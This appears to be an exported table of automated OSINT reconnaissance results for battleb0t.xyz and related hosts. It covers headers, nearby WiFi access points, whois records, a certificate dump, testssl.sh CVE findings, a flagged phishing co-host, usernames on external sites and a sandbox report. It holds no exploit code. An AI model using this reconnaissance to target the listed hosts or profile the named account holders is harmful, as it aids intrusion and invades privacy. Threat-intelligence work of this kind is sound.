| 2023-05-12 02:54:18 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} | nwapi.battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CATYLN (Net ID: 00:01:38:86:06:1F) | 37.7813933,-122.3918002 |
| 2023-05-12 02:46:03 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 34.148.97.127 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.234): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:41:28 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Netherlands | Eygelshoven, Limburg, LI, Netherlands, NL |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:01:24:F2:17:BC) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | G5 Base (Net ID: 00:02:2D:1B:5B:C9) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ProCare-Guest (Net ID: 00:01:21:1C:31:00) | 37.7813933,-122.3918002 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f60498977c3f0-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | ImageShack (Category: images)
https://imageshack.com/user/ayshoo | ayshoo |
| 2023-05-12 03:00:10 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:31:e0:5d:42:f2:be:35:60:b1:bf:3c:dd:6a:3a:
e9:66:ce:65:b9:42:55:e5:1f:5b:0f:4a:7d:d2:dd:
d5:d5:2a:c8:4c:26:cc:d6:24:4c:c6:8a:d7:5d:8d:
ad:45:7b:81:26:49:fc:64:c6:a9:da:25:d4:46:11:
f7:82:81:c2:c2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 14 05:12:32.135 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:59:29:35:BE:AB:71:65:F9:96:06:4F:
5B:59:CE:57:24:54:B9:12:04:B5:DF:8A:07:E6:76:0F:
20:03:70:03:02:21:00:B7:78:F0:A2:3F:27:E7:3B:21:
C5:33:D6:55:11:C6:40:C1:C5:5B:26:28:AF:CA:56:1E:
26:52:58:CD:58:16:E5
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 05:12:32.070 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:15:09:02:D4:FF:29:7B:0F:E9:E1:19:A4:
68:CC:B6:9A:5B:B7:91:A8:77:5F:34:7E:C8:58:7A:5D:
F7:C7:09:DA:02:20:1E:EF:33:8E:F5:7A:6D:A5:37:EA:
0D:F2:52:F7:31:2F:0F:C3:A2:0E:FC:59:37:68:C1:0E:
F3:7B:09:D9:73:6E
Signature Algorithm: ecdsa-with-SHA384
30:65:02:31:00:c4:f1:3e:03:59:6c:36:cb:84:da:12:51:f5:
76:a2:e4:bc:23:64:76:f4:b2:f0:4c:8f:9b:8b:90:fb:12:ce:
7b:42:97:0a:3a:61:32:82:0b:b0:21:2a:25:06:6a:5f:a9:02:
30:75:43:e3:50:ce:c6:89:24:bf:1b:e6:c4:50:fc:7d:e6:4e:
0c:28:05:6d:f7:e2:b6:59:55:90:02:80:b6:cc:fc:7e:93:a5:
f6:0f:4b:2a:01:37:a1:29:5b:b6:a5:1d:89
| ayhu.xyz |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 5 | 0 | 6 | 0 | None | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | netcraft.com |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:85:60) | 37.780462,-122.390564 |
| 2023-05-12 03:09:24 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 64.226.81.43 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:5E:40) | 41.8781, -87.6298 |
| 2023-05-12 03:11:42 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | panel.battleb0t.xyz |
| 2023-05-12 02:44:20 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [eliaspinheironeto.github.io]
https://www.openphish.com/feed.txt | eliaspinheironeto.github.io |
| 2023-05-12 03:01:28 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | nwapi.battleb0t.xyz |
| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.16): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.102): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/Altpapier | Altpapier |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:76:6D:DF) | 50.1188, 8.6843 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:8080 | 188.114.97.0/24 |
| 2023-05-12 02:44:06 | Domain Registrar | No | Whois | 0 | 0 | 1 | 0 | None | Registrar of domain names REG.RU LLC | battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F1:42:27) | 52.3759, 4.8975 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:59:0A:CB) | 40.2024, 29.0398 |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | http://panel.battleb0t.xyz | panel.battleb0t.xyz |
| 2023-05-12 02:55:15 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 165.232.113.85 |
| 2023-05-12 03:09:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-109-154.github.com | 185.199.109.154 |
| 2023-05-12 02:56:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://taisukemino.com/manifest.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f9c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_f9c_IE_EarlyTabStart_0x8a4_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f9c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f9c_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f9c_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3996"\n "IsoScope_f9c_ConnHashTable<3996>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3996"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "MG8E4216.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MG8E4216.txt]- [targetUID: 00000000-00003996]\n Dropped file: "VJJ3PF5T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VJJ3PF5T.txt]- [targetUID: 00000000-00003996]\n Dropped file: "QASBMQRN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QASBMQRN.txt]- [targetUID: 00000000-00003996]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab5EAE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab5E5E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_9134BD1A-54BA-11ED-9137-08002723F977_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF7760DEF9A5B2935.TMP" has type "data"- Location: [%TEMP%\\~DFF7760DEF9A5B2935.TMP]- [targetUID: 00000000-00003996]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003760]\n "Tar5E5F.tmp" has type "data"- Location: [%TEMP%\\Tar5E5F.tmp]- [targetUID: 00000000-00003760]\n "MG8E4216.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MG8E4216.txt]- [targetUID: 00000000-00003996]\n "VJJ3PF5T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VJJ3PF5T.txt]- [targetUID: 00000000-00003996]\n "Cab5EAE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab5EAE.tmp]- [targetUID: 00000000-00003760]\n "_52E741B2-54C5-11ED-9137-08002723F977_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFEEA8B6A1075BCD1A.TMP" has type "data"- Location: [%TEMP%\\~DFEEA8B6A1075BCD1A.TMP]- [targetUID: 00000000-00003996]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003996]\n "~DF96245F23D5A1C3EC.TMP" has type "data"- Location: [%TEMP%\\~DF96245F23D5A1C3EC.TMP]- [targetUID: 00000000-00003996]\n "Cab5E5E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab5E5E.tmp]- [targetUID: 00000000-00003760]\n "QASBMQRN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QASBMQRN.txt]- [targetUID: 00000000-00003996]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003760]\n "_C5C133BB-54B7-11ED-9137-08002723F977_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C5C133B9-54B7-11ED-9137-08002723F977_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar5EAF.tmp" has type "data"- Location: [%TEMP%\\Tar5EAF.tmp]- [targetUID: 00000000-00003760]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://taisukemino.com/manifest.webmanifest"\n Pattern match: "https://taisukemino.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: taisukemino.com\nDNT: 1\nConnection: Keep-Alive"'}], u'threat_level': 0, u'size': None, u'job_id': u'635882668f9ad024065477d8', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'104.196.30.220'], u'sha256': u'0d95c3235f13121a871148a672ac841f489584937622a18f2c4598bf58d8a241', u'sha512': u'7b9e66afaec29089757a6dd30779609d9cb82d3e634cb556234488c1985c5296e2edf8caef06dc9ff1dfb1f5a5b6f7a7778350afe50c428addea9fe830c9c8a8', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://taisukemino.com/manifest.webmanifest', u'submission_id': u'635882668f9ad024065477d9', u'created_at': u'2022-10-26T00:42:14+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-26T00:42:14+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'4bfaf38bf36192f89460ccb16d879958', u'network_mode': u'default', u'processes': [], u'sha1': u'f05d9deedd1cea4b8f2e921cef46764f981dc12a', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 104.196.30.220 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom460A18 (Net ID: 00:0C:F6:46:0A:18) | 50.8897, 6.0563 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | akniga (Category: hobby)
https://akniga.org/profile/login | login |
| 2023-05-12 02:47:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.110.153:443 | 185.199.110.153 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@porkbun.com | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
